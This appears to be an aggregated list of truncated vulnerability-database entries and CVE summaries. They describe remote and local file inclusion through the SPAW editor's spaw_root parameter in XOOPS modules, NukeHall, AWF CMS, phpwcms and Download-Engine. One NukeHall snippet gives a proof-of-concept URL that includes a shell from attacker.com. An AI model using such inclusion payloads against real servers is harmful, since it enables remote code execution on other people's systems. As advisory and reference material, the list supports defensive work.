xoops module wiwimod 0.4 - Remote File Inclusion Vulnerability

No description provided by source. XOOPS Module WiwiMod v0.4 spawroot RFI Vulnerability D.Script: http://codigolivre.org.br/frs/download.php/1745/xoops2-modwiwimod0.4xavierjimenez.zip V.Code : include $spawroot.'config/spawcontrol.config.php'; include $spawroot.'class/toolbars.class.php'; include...

NukeHall 0.3 - Multiple Remote File Inclusions

Discovered by cr4wl3r \ cr4wl3r4tlinuxmaildotorg NukeHall PoC : http://server/path/admin/modules/blocks.php?spawroot=http://attacker.com/shell.txt?cmd Vuln : ./nukehall0.3/admin/modules/messages.php line 28 PoC :...

cat2-lfi.txt

@===========================================@ | Author = StAkeR [email protected] | @===========================================@ + @==========================================================================@ | CAT2 = 1.Local File Inclusion Vulnerability |...

CAT2 (spaw_root) Local File Inclusion Vulnerability

No description provided by source. @===========================================@ | Author = StAkeR [email protected] | @===========================================@ + @==========================================================================@ | CAT2 = 1.Local File Inclusion Vulnerability |...

XOOPS Module WiwiMod 0.4 Remote File Inclusion Vulnerability

No description provided by source. XOOPS Module WiwiMod v0.4 spawroot RFI Vulnerability D.Script: http://codigolivre.org.br/frs/download.php/1745/xoops2-modwiwimod0.4xavierjimenez.zip V.Code : include $spawroot.'config/spawcontrol.config.php'; include $spawroot.'class/toolbars.class.php'; include...

XOOPS Module wiwimod 0.4 - Remote File Inclusion

XOOPS Module WiwiMod v0.4 spawroot RFI Vulnerability D.Script: http://codigolivre.org.br/frs/download.php/1745/xoops2-modwiwimod0.4xavierjimenez.zip V.Code : include $spawroot.'config/spawcontrol.config.php'; include $spawroot.'class/toolbars.class.php'; include $spawroot.'class/lang.class.php'; ...

Remote file inclusion

PHP remote file inclusion vulnerability in admin/spaw/spawcontrol.class.php in the XT-Conteudo module for XOOPS allows remote attackers to execute arbitrary PHP code via a URL in the spawroot parameter. NOTE: this issue is probably a duplicate of CVE-2006-4656...

Remote file inclusion

PHP remote file inclusion vulnerability in admin/editor2/spawcontrol.class.php in the Cjay Content 3 module for XOOPS allows remote attackers to execute arbitrary PHP code via a URL in the spawroot parameter. NOTE: this may be a duplicate of CVE-2006-4656...

CVE-2007-3220

PHP remote file inclusion vulnerability in admin/editor2/spawcontrol.class.php in the Cjay Content 3 module for XOOPS allows remote attackers to execute arbitrary PHP code via a URL in the spawroot parameter. NOTE: this may be a duplicate of CVE-2006-4656...

CVE-2007-3220

CVE-2007-3220 affects the Cjay Content 3 module for XOOPS, specifically admin/editor2/spaw_control.class.php, where the spaw_root parameter enables PHP remote file inclusion. The underlying issue is improper handling/validation of spaw_root, allowing an attacker to cause arbitrary PHP code execut...

Xoops iContent模块Spaw_Control.Class.PHP远程文件包含漏洞

Xoops iContent模块是一款基于PHP的WEB应用程序。 Xoops iContent模块不正确过滤用户提交的输入，远程攻击者可以利用漏洞以WEB权限执行任意命令。 问题是'SpawControl.Class.PHP'脚本对用户提交的WEB参数缺少过滤，指定远程服务器上的文件作为包含参数，可导致以WEB权限执行任意命令。 Xoops iContent Module 1.0 目前没有解决方案提供： http://mirror.in.th/sourceforge.net/x/xo/xoops...

XOOPS Multiple Modules spaw_control.class.php spaw_root Parameter Remote File Inclusion

The remote host is running a third-party module for XOOPS. The version of at least one such module installed on the remote host includes a copy of the SPAW PHP WYSIWYG editor control that fails to sanitize user-supplied input to the 'spawroot' parameter of the 'spawcontrol.class.php' script befor...

CVE-2006-5291

PHP remote file inclusion vulnerability in admin/includes/spaw/spawcontrol.class.php in Download-Engine 1.4.2 allows remote attackers to execute arbitrary PHP code via a URL in the spawroot parameter. NOTE: CVE analysis suggests that this issue is actually in a third party product, SPAW Editor PH...

CVE-2006-5291

The vulnerability CVE-2006-5291 affects Download-Engine 1.4.2 through a PHP remote file inclusion in admin/includes/spaw/spaw_control.class.php, exploitable via a URL in the spaw_root parameter to execute arbitrary PHP code on the server. The issue is noted as potentially in the third-party SPAW ...

AWF CMS 1.11, Remote command execution

----------------------------------------------------- Advisory id: FSA:011 Author: Federico Fazzi Date: 11/06/2006, 22:30 Sinthesis: AWF CMS 1.11, Remote command execution Type: high Product: http://www.awf-cms.org/ Patch: unavailable ----------------------------------------------------- 1...

AWF CMS 1.11 - 'spaw_root' Remote File Inclusion

----------------------------------------------------- Advisory id: FSA:011 Author: Federico Fazzi Date: 11/06/2006, 22:30 Sinthesis: AWF CMS 1.11, Remote command execution Type: high Product: http://www.awf-cms.org/ Patch: unavailable ----------------------------------------------------- 1...

phpwcms spaw_control.class.php spaw_root Parameter Remote File Inclusion

The remote host is running phpwcms, an open source content management system written in PHP. The version of phpwcms installed on the remote host fails to sanitize user-supplied input to the 'spawroot' parameter before using it in PHP include functions in the...

CVE-2006-2519

Directory traversal vulnerability in include/incext/spaw/spawcontrol.class.php in phpwcms 1.2.5-DEV allows remote attackers to include arbitrary local files via .. dot dot sequences in the spawroot parameter. NOTE: CVE analysis suggests that this issue is actually in SPAW Editor PHP Edition...